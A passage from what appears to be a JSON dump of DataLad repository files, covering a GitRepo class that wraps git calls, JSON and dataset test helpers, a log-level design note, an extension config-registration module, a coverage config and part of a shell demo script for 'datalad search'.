'gc.auto=0']\n _GIT_COMMON_OPTIONS = [\n \"-c\", \"diff.ignoreSubmodules=none\",\n # To gain consistent, albeit possibly insecure (?) behavior of git/git-annex\n # in quoting or note the paths.\n # Behavior of git-annex on treating this setting has changed around\n # 10.20230407-18-gdf6f9f1ee8 where it started to respect default =true and\n # quote. 
See https://github.com/datalad/datalad/pull/7372#issuecomment-1533507701\n \"-c\", \"core.quotepath=false\",\n ]\n _git_cmd_prefix = [\"git\"] + _GIT_COMMON_OPTIONS\n\n # Begin Flyweight:\n\n _unique_instances = WeakValueDictionary()\n\n def _flyweight_invalid(self):\n return not self.is_valid()\n\n @classmethod\n def _flyweight_reject(cls, id_, *args, **kwargs):\n pass\n\n @classmethod\n def _cleanup(cls, path):\n # Ben: I think in case of GitRepo there's nothing to do ATM. Statements\n # like the one in the out commented __del__ above, don't make sense\n # with python's GC, IMO, except for manually resolving cyclic\n # references (not the case w/ ConfigManager ATM).\n lgr.log(1, \"Finalizer called on: GitRepo(%s)\", path)\n\n def __hash__(self):\n # the flyweight key is already determining unique instances\n # add the class name to distinguish from strings of a path\n return hash((self.__class__.__name__, self.__weakref__.key))\n\n # End Flyweight\n\n def __init__(self, path):\n # A lock to prevent multiple threads performing write operations in parallel\n self._write_lock = threading.Lock()\n\n # Note, that the following three path objects are used often and\n # therefore are stored for performance. Path object creation comes with\n # a cost. Most notably, this is used for validity checking of the\n # repository.\n self.pathobj = Path(path)\n self.dot_git = _get_dot_git(self.pathobj, ok_missing=True)\n self._valid_git_test_path = self.dot_git / 'HEAD'\n\n self._cfg = None\n self._git_runner = GitWitlessRunner(cwd=self.pathobj)\n\n self.__fake_dates_enabled = None\n\n self._line_splitter = None\n\n # Finally, register a finalizer (instead of having a __del__ method).\n # This will be called by garbage collection as well as \"atexit\". By\n # keeping the reference here, we can also call it explicitly.\n # Note, that we can pass required attributes to the finalizer, but not\n # `self` itself. This would create an additional reference to the object\n # and thereby preventing it from being collected at all.\n self._finalizer = finalize(self, GitRepo._cleanup, self.pathobj)\n\n def __eq__(self, obj):\n \"\"\"Decides whether or not two instances of this class are equal.\n\n This is done by comparing the base repository path.\n \"\"\"\n return self.pathobj == obj.pathobj\n\n def is_valid(self_or_path):\n \"\"\"Returns whether the underlying repository appears to be still valid\n\n This method can be used as an instance method or a class method.\n \"\"\"\n # preserving notes from the original implementations in GitRepo\n #\n # Note, that this almost identical to the classmethod is_valid_repo().\n # However, if we are testing an existing instance, we can save Path object\n # creations. Since this testing is done a lot, this is relevant. Creation\n # of the Path objects in is_valid_repo() takes nearly half the time of the\n # entire function.\n\n # Also note, that this method is bound to an instance but still\n # class-dependent, meaning that a subclass cannot simply overwrite it.\n # This is particularly important for the call from within __init__(),\n # which in turn is called by the subclasses' __init__. 
Using an overwrite\n # would lead to the wrong thing being called.\n if not isinstance(self_or_path, GitRepo):\n # called like a classmethod, perform test without requiring\n # a repo instance\n if not isinstance(self_or_path, Path):\n self_or_path = Path(self_or_path)\n dot_git_path = self_or_path / '.git'\n return (dot_git_path.exists() and (\n not dot_git_path.is_dir() or (dot_git_path / 'HEAD').exists()\n )) or (self_or_path / 'HEAD').exists()\n else:\n # called as a method of a repo instance\n return self_or_path.dot_git.exists() and (\n not self_or_path.dot_git.is_dir()\n or self_or_path._valid_git_test_path.exists()\n )\n\n @property\n def cfg(self):\n \"\"\"Get a ConfigManager instance for this repository\n\n Returns\n -------\n ConfigManager\n \"\"\"\n if self._cfg is None:\n # associate with this dataset and read the entire config hierarchy\n self._cfg = ConfigManager(dataset=self, source='any')\n return self._cfg\n\n @property\n def _fake_dates_enabled(self):\n \"\"\"Is the repository configured to use fake dates?\n\n This is an internal query performance helper for the datalad.fake-dates\n config option.\n \"\"\"\n if self.__fake_dates_enabled is None:\n self.__fake_dates_enabled = \\\n self.cfg.getbool('datalad', 'fake-dates', default=False)\n return self.__fake_dates_enabled\n\n def add_fake_dates_to_env(self, env=None):\n \"\"\"Add fake dates to `env`.\n\n Parameters\n ----------\n env : dict, optional\n Environment variables.\n\n Returns\n -------\n A dict (copied from env), with date-related environment\n variables for git and git-annex set.\n \"\"\"\n env = (env if env is not None else environ).copy()\n # Note: Use _git_custom_command here rather than repo.git.for_each_ref\n # so that we use annex-proxy in direct mode.\n last_date = list(self.for_each_ref_(\n fields='committerdate:raw',\n count=1,\n pattern='refs/heads',\n sort=\"-committerdate\",\n ))\n\n if last_date:\n # Drop the \"contextual\" timezone, leaving the unix timestamp. We\n # avoid :unix above because it wasn't introduced until Git v2.9.4.\n last_date = last_date[0]['committerdate:raw'].split()[0]\n seconds = int(last_date)\n else:\n seconds = self.cfg.obtain(\"datalad.fake-dates-start\")\n seconds_new = seconds + 1\n date = \"@{} +0000\".format(seconds_new)\n\n lgr.debug(\"Setting date to %s\",\n time.strftime(\"%a %d %b %Y %H:%M:%S +0000\",\n time.gmtime(seconds_new)))\n\n env[\"GIT_AUTHOR_DATE\"] = date\n env[\"GIT_COMMITTER_DATE\"] = date\n env[\"GIT_ANNEX_VECTOR_CLOCK\"] = str(seconds_new)\n\n return env\n\n def _generator_call_git(self,\n args,\n *,\n files=None,\n env=None,\n pathspec_from_file: Optional[bool]=False,\n sep=None):\n \"\"\"\n Call git, yield stdout and stderr lines when available. Output lines\n are split at line ends or `sep` if `sep` is not None.\n\n Parameters\n ----------\n sep : str, optional\n Use `sep` as line separator. Does not create an empty last line if\n the input ends on sep. 
The lines contain the separator, if it exists.\n\n All other parameters match those described for `call_git`.\n\n Returns\n -------\n Generator that yields tuples of `(file_no, line)`, where `file_no` is\n either:\n\n - `datalad.runner.nonasyncrunner.STDOUT_FILENO` for stdout, or\n - `datalad.runner.nonasyncrunner.STDERR_FILENO` for stderr,\n\n and `line` is the next result line, split on `sep`, or on standard line\n ends.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n \"\"\"\n\n class GeneratorStdOutErrCapture(GeneratorMixIn,\n AssemblingDecoderMixIn,\n StdOutErrCapture):\n \"\"\"\n Generator-runner protocol that captures and yields stdout and stderr.\n \"\"\"\n def __init__(self):\n GeneratorMixIn.__init__(self)\n AssemblingDecoderMixIn.__init__(self)\n StdOutErrCapture.__init__(self)\n\n def pipe_data_received(self, fd, data):\n if fd in (1, 2):\n self.send_result((fd, self.decode(fd, data, self.encoding)))\n else:\n StdOutErrCapture.pipe_data_received(self, fd, data)\n\n cmd = self._git_cmd_prefix + args\n\n if files:\n # only call the wrapper if needed (adds distraction logs\n # otherwise, and also maintains the possibility to connect\n # stdin in the future)\n generator = self._git_runner.run_on_filelist_chunks_items_(\n cmd,\n files,\n protocol=GeneratorStdOutErrCapture,\n env = env,\n pathspec_from_file = pathspec_from_file,\n )\n elif files is not None:\n # it was an empty structure, so we did provide paths but \"empty\",\n # then we must not return anything. For more reasoning see\n # ec0243c92822f36ada5e87557eb9f5f53929c9ff which added similar code pattern\n # within get_content_info\n return\n else:\n generator = self._git_runner.run(\n cmd,\n protocol=GeneratorStdOutErrCapture,\n env=env)\n\n line_splitter = {\n STDOUT_FILENO: LineSplitter(sep, keep_ends=True),\n STDERR_FILENO: LineSplitter(sep, keep_ends=True)\n }\n\n for file_no, content in generator:\n if file_no in (STDOUT_FILENO, STDERR_FILENO):\n for line in line_splitter[file_no].process(content):\n yield file_no, line\n else:\n raise ValueError(f\"unknown file number: {file_no}\")\n\n for file_no in (STDOUT_FILENO, STDERR_FILENO):\n remaining_content = line_splitter[file_no].finish_processing()\n if remaining_content is not None:\n yield file_no, remaining_content\n\n def _call_git(self,\n args,\n files=None,\n expect_stderr=False,\n expect_fail=False,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Allows for calling arbitrary commands.\n\n Internal helper to the call_git*() methods.\n Unlike call_git, _call_git returns both stdout and stderr.\n The parameters, return value, and raised exceptions match those\n documented for `call_git`, with the exception of env, which allows to\n specify the custom environment (variables) to be used.\n \"\"\"\n runner = self._git_runner\n stderr_log_level = {True: 5, False: 11}[expect_stderr]\n\n read_write = not read_only\n if read_write and self._fake_dates_enabled:\n env = self.add_fake_dates_to_env(env if env else runner.env)\n\n output = {\n STDOUT_FILENO: [],\n STDERR_FILENO: [],\n }\n\n with lock_if_required(read_write, self._write_lock), \\\n git_ignore_check(expect_fail, output[STDOUT_FILENO], output[STDERR_FILENO]):\n\n for file_no, line in self._generator_call_git(args,\n files=files,\n env=env,\n pathspec_from_file=pathspec_from_file,\n ):\n output[file_no].append(line)\n\n for line in output[STDERR_FILENO]:\n lgr.log(stderr_log_level,\n \"stderr| \" + line.rstrip(\"\\n\"))\n return (\n 
\"\".join(output[STDOUT_FILENO]),\n \"\".join(output[STDERR_FILENO]))\n\n def call_git(self, args, files=None,\n expect_stderr=False, expect_fail=False,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Call git and return standard output.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `git`.\n files : list of str, optional\n File arguments to pass to `git`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n expect_stderr : bool, optional\n Standard error is expected and should not be elevated above the DEBUG\n level.\n expect_fail : bool, optional\n A non-zero exit is expected and should not be elevated above the\n DEBUG level.\n pathspec_from_file : bool, optional\n Could be set to True for a `git` command which supports\n --pathspec-from-file and --pathspec-file-nul options. Then pathspecs\n would be passed through a temporary file.\n read_only : bool, optional\n By setting this to True, the caller indicates that the command does\n not write to the repository, which lets this function skip some\n operations that are necessary only for commands the modify the\n repository. Beware that even commands that are conceptually\n read-only, such as `git-status` and `git-diff`, may refresh and write\n the index.\n\n Returns\n -------\n standard output (str)\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n \"\"\"\n return \"\".join(\n self.call_git_items_(args,\n files,\n expect_stderr=expect_stderr,\n expect_fail=expect_fail,\n env=env,\n pathspec_from_file=pathspec_from_file,\n read_only=read_only,\n keep_ends=True))\n\n def call_git_items_(self,\n args,\n files=None,\n expect_stderr=False,\n expect_fail=False,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n read_only=False,\n sep=None,\n keep_ends=False):\n \"\"\"\n Call git, yield output lines when available. Output lines are split\n at line ends or `sep` if `sep` is not None.\n\n Parameters\n ----------\n sep : str, optional\n Use sep as line separator. Does not create an empty last line if\n the input ends on sep.\n\n All other parameters match those described for `call_git`.\n\n Returns\n -------\n Generator that yields stdout items, i.e. lines with the line ending or\n separator removed.\n\n Please note, this method is meant to be used to process output that is\n meant for 'interactive' interpretation. It is not intended to return\n stdout from a command like \"git cat-file\". The reason is that\n it strips of the line endings (or separator) from the result lines,\n unless 'keep_ends' is True. 
If 'keep_ends' is False, you will not know\n which line ending was stripped (if 'separator' is None) or whether a\n line ending (or separator) was stripped at all, because the last line\n may not have a line ending (or separator).\n\n If you want to reliably recreate the output set 'keep_ends' to True and\n \"\".join() the result, or use 'GitRepo.call_git()' instead.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n \"\"\"\n\n read_write = not read_only\n if read_write and self._fake_dates_enabled:\n env = self.add_fake_dates_to_env(\n env if env else self._git_runner.env)\n\n stderr_lines = []\n\n with lock_if_required(read_write, self._write_lock), \\\n git_ignore_check(expect_fail, None, stderr_lines):\n\n for file_no, line in self._generator_call_git(\n args,\n files=files,\n env=env,\n pathspec_from_file=pathspec_from_file,\n sep=sep):\n if file_no == STDOUT_FILENO:\n if keep_ends is True:\n yield line\n else:\n if sep:\n yield line.rstrip(sep)\n else:\n yield line.rstrip()\n else:\n stderr_lines.append(line)\n\n stderr_log_level = {True: 5, False: 11}[expect_stderr]\n for line in stderr_lines:\n lgr.log(stderr_log_level, \"stderr| \" + line.strip(\"\\n\"))\n\n def call_git_oneline(self, args, files=None, expect_stderr=False,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Call git for a single line of output.\n\n All other parameters match those described for `call_git`.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n AssertionError if there is more than one line of output.\n \"\"\"\n lines = list(self.call_git_items_(args, files=files,\n expect_stderr=expect_stderr,\n pathspec_from_file=pathspec_from_file,\n read_only=read_only))\n if len(lines) > 1:\n raise AssertionError(\n \"Expected {} to return single line, but it returned {}\"\n .format([\"git\"] + args, lines))\n return lines[0]\n\n def call_git_success(self, args, files=None, expect_stderr=False,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Call git and return true if the call exit code of 0.\n\n All parameters match those described for `call_git`.\n\n Returns\n -------\n bool\n \"\"\"\n try:\n self._call_git(\n args, files, expect_fail=True, expect_stderr=expect_stderr,\n pathspec_from_file=pathspec_from_file,\n read_only=read_only)\n\n except CommandError:\n return False\n return True\n\n def init(self, sanity_checks=True, init_options=None):\n \"\"\"Initializes the Git repository.\n\n Parameters\n ----------\n create_sanity_checks: bool, optional\n Whether to perform sanity checks during initialization if the target\n path already exists, such as that new repository is not created in\n the directory where git already tracks some files.\n init_options: list, optional\n Additional options to be appended to the `git-init` call.\n \"\"\"\n pathobj = self.pathobj\n path = str(pathobj)\n\n if not lexists(path):\n pathobj.mkdir(parents=True)\n elif sanity_checks:\n # Verify that we are not trying to initialize a new git repository\n # under a directory some files of which are already tracked by git\n # use case: https://github.com/datalad/datalad/issues/3068\n try:\n stdout, _ = self._call_git(\n ['-C', path, 'ls-files'],\n expect_fail=True,\n read_only=True,\n )\n if stdout:\n raise PathKnownToRepositoryError(\n \"Failing to initialize new repository under %s where \"\n \"following files are known to a repository above: %s\"\n % (path, stdout)\n )\n except CommandError:\n # assume that all is good -- we are not 
under any repo\n pass\n\n cmd = ['-C', path, 'init']\n cmd.extend(ensure_list(init_options))\n lgr.debug(\n \"Initializing empty Git repository at '%s'%s\",\n path,\n ' %s' % cmd[3:] if cmd[3:] else '')\n\n stdout, stderr = self._call_git(\n cmd,\n # we don't want it to scream on stdout\n expect_fail=True,\n # there is no commit, and none will be made\n read_only=True)\n\n # after creation we need to reconsider .git path\n self.dot_git = _get_dot_git(self.pathobj, ok_missing=True)\n\n return self\n\n def for_each_ref_(self, fields=('objectname', 'objecttype', 'refname'),\n pattern=None, points_at=None, sort=None, count=None,\n contains=None):\n \"\"\"Wrapper for `git for-each-ref`\n\n Please see manual page git-for-each-ref(1) for a complete overview\n of its functionality. Only a subset of it is supported by this\n wrapper.\n\n Parameters\n ----------\n fields : iterable or str\n Used to compose a NULL-delimited specification for for-each-ref's\n --format option. The default field list reflects the standard\n behavior of for-each-ref when the --format option is not given.\n pattern : list or str, optional\n If provided, report only refs that match at least one of the given\n patterns.\n points_at : str, optional\n Only list refs which points at the given object.\n sort : list or str, optional\n Field name(s) to sort-by. If multiple fields are given, the last one\n becomes the primary key. Prefix any field name with '-' to sort in\n descending order.\n count : int, optional\n Stop iteration after the given number of matches.\n contains : str, optional\n Only list refs which contain the specified commit.\n\n Yields\n ------\n dict with items matching the given `fields`\n\n Raises\n ------\n ValueError\n if no `fields` are given\n\n RuntimeError\n if `git for-each-ref` returns a record where the number of\n properties does not match the number of `fields`\n \"\"\"\n if not fields:\n raise ValueError('no `fields` provided, refuse to proceed')\n fields = ensure_list(fields)\n cmd = [\n \"for-each-ref\",\n \"--format={}\".format(\n '%00'.join(\n '%({})'.format(f) for f in fields)),\n ]\n if points_at:\n cmd.append('--points-at={}'.format(points_at))\n if contains:\n cmd.append('--contains={}'.format(contains))\n if sort:\n for k in ensure_list(sort):\n cmd.append('--sort={}'.format(k))\n if pattern:\n cmd += ensure_list(pattern)\n if count:\n cmd.append('--count={:d}'.format(count))\n\n for line in self.call_git_items_(cmd, read_only=True):\n props = line.split('\\0')\n if len(fields) != len(props):\n raise RuntimeError(\n 'expected fields {} from git-for-each-ref, but got: {}'.format(\n fields, props))\n yield dict(zip(fields, props))\n\n\n#\n# Internal helpers\n#\ndef _get_dot_git(pathobj, *, ok_missing=False, resolved=False):\n \"\"\"Given a pathobj to a repository return path to the .git directory\n\n Parameters\n ----------\n pathobj: Path\n ok_missing: bool, optional\n Allow for .git to be missing (useful while sensing before repo is\n initialized)\n resolved : bool, optional\n Whether to resolve any symlinks in the path, at a performance cost.\n\n Raises\n ------\n RuntimeError\n When ok_missing is False and .git path does not exist\n\n Returns\n -------\n Path\n Path to the (resolved) .git directory. 
If `resolved` is False, and\n the given `pathobj` is not an absolute path, the returned path will\n also be relative.\n \"\"\"\n dot_git = pathobj / '.git'\n if dot_git.is_dir():\n # deal with the common case immediately, an existing dir\n return dot_git.resolve() if resolved else dot_git\n elif not dot_git.exists():\n # missing or bare\n if (pathobj / 'HEAD').exists() and (pathobj / 'config').exists():\n return pathobj.resolve() if resolved else pathobj\n elif not ok_missing:\n raise RuntimeError(\"Missing .git in %s.\" % pathobj)\n else:\n # resolve to the degree possible\n return dot_git.resolve(strict=False)\n # continue with more special cases\n elif dot_git.is_file():\n with dot_git.open() as f:\n line = f.readline()\n if line.startswith(\"gitdir: \"):\n dot_git = pathobj / line[7:].strip()\n return dot_git.resolve() if resolved else dot_git\n else:\n raise InvalidGitRepositoryError(\"Invalid .git file\")\n raise RuntimeError(\"Unaccounted condition\")\n" }, { "alpha_fraction": 0.5959475636482239, "alphanum_fraction": 0.6094557046890259, "avg_line_length": 27.931034088134766, "blob_id": "d1e89096e42989ee90dc4828a16f66d17876a4e5", "content_id": "3e95b05be18c519e7ec7116794b9c6446eddefa8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2521, "license_type": "permissive", "max_line_length": 106, "num_lines": 87, "path": "/datalad/support/tests/test_json_py.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport os.path as op\nfrom json import JSONDecodeError\n\nfrom datalad.support.json_py import (\n dump,\n dump2stream,\n load,\n load_stream,\n loads,\n)\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n eq_,\n swallow_logs,\n with_tempfile,\n)\n\n\n@with_tempfile(content=b'{\"Authors\": [\"A1\"\\xc2\\xa0, \"A2\"]}')\ndef test_load_screwy_unicode(fname=None):\n # test that we can tollerate some screwy unicode embeddings within json\n assert_raises(JSONDecodeError, load, fname, fixup=False)\n with swallow_logs(new_level=logging.WARNING) as cml:\n eq_(load(fname), {'Authors': ['A1', 'A2']})\n assert_in('Failed to decode content', cml.out)\n\n\n@with_tempfile(content=u\"\"\"\\\n{\"key0\": \"a
b\"}\n{\"key1\": \"plain\"}\"\"\".encode(\"utf-8\"))\ndef test_load_unicode_line_separator(fname=None):\n # See gh-3523.\n result = list(load_stream(fname))\n eq_(len(result), 2)\n eq_(result[0][\"key0\"], u\"a
b\")\n eq_(result[1][\"key1\"], u\"plain\")\n\n\ndef test_loads():\n eq_(loads('{\"a\": 2}'), {'a': 2})\n with assert_raises(JSONDecodeError),\\\n swallow_logs(new_level=logging.WARNING) as cml:\n loads('{\"a\": 2}x')\n assert_in('Failed to load content from', cml.out)\n\n\n@with_tempfile(mkdir=True)\ndef test_compression(path=None):\n fname = op.join(path, 'test.json.xz')\n content = 'dummy'\n # dump compressed\n dump(content, fname, compressed=True)\n # filename extension match auto-enabled compression \"detection\"\n eq_(load(fname), content)\n # but was it actually compressed?\n # we don't care how exactly it blows up (UnicodeDecodeError, etc),\n # but it has to blow\n assert_raises(Exception, load, fname, compressed=False)\n\n\n@with_tempfile\ndef test_dump(path=None):\n assert(not op.exists(path))\n # dump is nice and create the target directory\n dump('some', op.join(path, 'file.json'))\n assert(op.exists(path))\n\n\n# at least a smoke test\n@with_tempfile\ndef test_dump2stream(path=None):\n stream = [dict(a=5), dict(b=4)]\n dump2stream([dict(a=5), dict(b=4)], path)\n eq_(list(load_stream(path)), stream)\n" }, { "alpha_fraction": 0.5806878209114075, "alphanum_fraction": 0.6005290746688843, "avg_line_length": 37.79487228393555, "blob_id": "85ac6cfe4746177806946f0e02121d0a1ca81037", "content_id": "ccd14ca2152641a6424b4fac0a44128a9e02772e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1512, "license_type": "permissive", "max_line_length": 87, "num_lines": 39, "path": "/datalad/tests/utils_testdatasets.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\n\nfrom os.path import join as opj\nfrom datalad.distribution.dataset import Dataset\n\ndef _make_dataset_hierarchy(path):\n origin = Dataset(path).create()\n origin_sub1 = origin.create('sub1')\n origin_sub2 = origin_sub1.create('sub2')\n with open(opj(origin_sub2.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content2')\n origin_sub3 = origin_sub2.create('sub3')\n with open(opj(origin_sub3.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content3')\n origin_sub4 = origin_sub3.create('sub4')\n origin.save(recursive=True)\n return origin, origin_sub1, origin_sub2, origin_sub3, origin_sub4\n\n\ndef _mk_submodule_annex(path, fname, fcontent):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(path).create(**ca)\n (origds.pathobj / fname).write_text(fcontent)\n # naming is weird, but a legacy artifact\n s1 = origds.create('subm 1', **ca)\n (s1.pathobj / fname).write_text(fcontent)\n s2 = origds.create('2', **ca)\n (s2.pathobj / fname).write_text(fcontent)\n origds.save(recursive=True, **ca)\n return origds" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6738682985305786, "avg_line_length": 24.578947067260742, "blob_id": "c9a4534b4fa067e6ed9b4376bc4a59fb9cc5f3b2", "content_id": "1d13e9fdf599e82d0e7f46742a785be2e1e8a9c2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 972, 
"license_type": "permissive", "max_line_length": 96, "num_lines": 38, "path": "/docs/source/design/log_levels.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_log_levels:\n\n**********\nLog levels\n**********\n\n.. topic:: Specification scope and status\n\n This specification provides a partial overview of the current\n implementation.\n\n\nLog messages are emitted by a wide range of operations within DataLad. They are\ncategorized into distinct levels. While some levels have self-explanatory\ndescriptions (e.g. ``warning``, ``error``), others are less specific (e.g.\n``info``, ``debug``).\n\nCommon principles\n=================\n\nParenthical log message use the same level\n When log messages are used to indicate the start and end of an operation,\n both start and end message use the same log-level.\n\nUse cases\n=========\n\nCommand execution\n-----------------\n\nFor the :class:`~datalad.cmd.WitlessRunner` and its protocols the following log levels are used:\n\n- High-level execution -> ``debug``\n- Process start/finish -> ``8``\n- Threading and IO -> ``5``\n" }, { "alpha_fraction": 0.6595162749290466, "alphanum_fraction": 0.6605678200721741, "avg_line_length": 37.040000915527344, "blob_id": "5d4d0cc041793cf7f8276c3d74b8ff0ea1fbe7e4", "content_id": "58a7d595a8473468597f4d6e8cbb8f7645fdeb44", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4755, "license_type": "permissive", "max_line_length": 87, "num_lines": 125, "path": "/datalad/support/extensions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Support functionality for extension development\"\"\"\n\nimport logging\nfrom datalad.interface.common_cfg import (\n _NotGiven,\n _ConfigDefinition,\n definitions as _definitions,\n)\n\n__all__ = ['register_config', 'has_config']\n\nlgr = logging.getLogger('datalad.support.extensions')\n\n\ndef register_config(\n name,\n title,\n *,\n default=_NotGiven,\n default_fn=_NotGiven,\n description=None,\n # yes, we shadow type, this is OK\n type=_NotGiven,\n # for manual entry\n dialog=None,\n scope=_NotGiven,\n ):\n \"\"\"Register a configuration item\n\n This function can be used by DataLad extensions and other client\n code to register configurations items and their documentation with\n DataLad's configuration management. Specifically, these definitions\n will be interpreted by and acted on by the `configuration` command,\n and `ConfigManager.obtain()`.\n\n At minimum, each item must be given a name, and a title. Optionally, any\n configuration item can be given a default (or a callable to compute a\n default lazily on access), a type-defining/validating callable (i.e.\n `Constraint`), a (longer) description, a dialog type to enable manual\n entry, and a configuration scope to store entered values in.\n\n Parameters\n ----------\n name: str\n Configuration item name, in most cases starting with the prefix\n 'datalad.' followed by at least a section name, and a variable\n name, e.g. 
'datalad.section.variable', following Git's syntax for\n configuration items.\n title: str\n The briefest summary of the configuration item's purpose, typically\n written in the style of a headline for a dialog UI, or that of an\n explanatory inline comment just prior the item definitions.\n default: optional\n A default value that is already known at the time of registering the\n configuration items. Can be of any type.\n default_fn: callable, optional\n A callable to compute a default value lazily on access. The can be\n used, if the actual value is not yet known at the time of registering\n the configuration item, or if the default is expensive to compute\n and its evaluation needs to be deferred to prevent slow startup\n (configuration items are typically defined as one of the first things\n on import).\n description: str, optional\n A longer description to accompany the title, possibly with instructions\n on how a sensible value can be determined, or with details on the\n impact of a configuration switch.\n type: callable, optional\n A callable to perform arbitrary type conversion and validation of value\n (or default values). If validation/conversion fails, the callable\n must raise an arbitrary exception. The `str(callable)` is used as\n a type description.\n dialog: {'yesno', 'question'}\n A type of UI dialog to use when manual value entry is attempted\n (only in interactive sessions, and only when no default is defined.\n `title` and `description` will be displayed in this dialog.\n scope: {'override', 'global', 'local', 'branch'}, optional\n If particular code requests the storage of (manually entered) values,\n but defines no configuration scope, this default scope will be used.\n\n Raises\n ------\n ValueError\n For missing required, or invalid configuration properties.\n \"\"\"\n kwargs = dict(\n default=default,\n default_fn=default_fn,\n scope=scope,\n type=type\n )\n kwargs = {k: v for k, v in kwargs.items() if v is not _NotGiven}\n if dialog is not None and not title:\n raise ValueError(\"Configuration dialog must have a title\")\n doc_props = dict(title=title)\n if description:\n doc_props['text'] = description\n # dialog is OK to be None, this is not just about UI, even if\n # the key of the internal data structure seems to suggest that.\n # it is also the source for annotating config listings\n kwargs['ui'] = (dialog, doc_props)\n _definitions[name] = _ConfigDefinition(**kwargs)\n\n\ndef has_config(name):\n \"\"\"Returns whether a configuration item is registered under the given name\n\n Parameters\n ----------\n\n name: str\n Configuration item name\n\n Returns\n -------\n bool\n \"\"\"\n return name in _definitions\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 15.285714149475098, "blob_id": "a99b951f5a4b51668418bdf6a61e689e45fbfb81", "content_id": "e28ab91ae066df080d876e3d68bfe045fabce6db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 114, "license_type": "permissive", "max_line_length": 39, "num_lines": 7, "path": "/.coveragerc", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[paths]\nsource =\n datalad/\n */datalad/\n[report]\n# show lines missing coverage in output\nshow_missing = True\n" }, { "alpha_fraction": 0.7601068019866943, "alphanum_fraction": 0.7646834254264832, "avg_line_length": 78.48484802246094, "blob_id": "e0cbc504547f054426bd61d401c9e5354b148014", "content_id": 
"e565f3d02ffc23c769163a004ec6d34e1bfb894b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2622, "license_type": "permissive", "max_line_length": 316, "num_lines": 33, "path": "/docs/casts/basic_search.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "full_title=\"Demo of basic datasets meta-data search using DataLad\"\n#run \"set -eu # Fail early if any error happens\"\n\nsay \"DataLad allows to aggregate dataset-level meta-data, i.e. data describing the dataset (description, authors, etc), from a variety of formats (see http://docs.datalad.org/en/latest/metadata.html for more info).\"\nsay 'In this example we will start from a point where someone who has not used datalad before decided to find datasets which related to \"raiders\" (after \"Raiders of the Lost Ark\" movie) and neuroimaging.'\nsay 'As you will see below, upon the very first invocation of \"datalad search\" command, DataLad will need first to acquire aggregated meta-data for our collection of datasets available at https://datasets.datalad.org and for that it will install that top level super-dataset (a pure git repository) under ~/datalad:'\n( sleep 4; type yes; key Return; ) &\nrun \"datalad search raiders neuroimaging\"\n\nsay '\"search\" searches within current dataset (unless -d option is used), and if it is outside of any it would offer to search within the ~/datalad we have just installed'\n( sleep 4; type yes; key Return; ) &\nrun \"datalad search raiders neuroimaging\"\n\nsay \"To avoid interactive question, you can specify to search within that dataset by using -d /// . And now let's specialize the search to not only list the dataset location, but also report the fields where match was found. This time let's search for datasets with Haxby among the authors\"\nrun \"datalad search -d /// -s author -R haxby\"\nsay \"For convenience let's switch to that directory, and now all result paths to datasets (not yet installed) would be relative to current directory\"\nrun \"cd ~/datalad\"\nrun \"datalad search 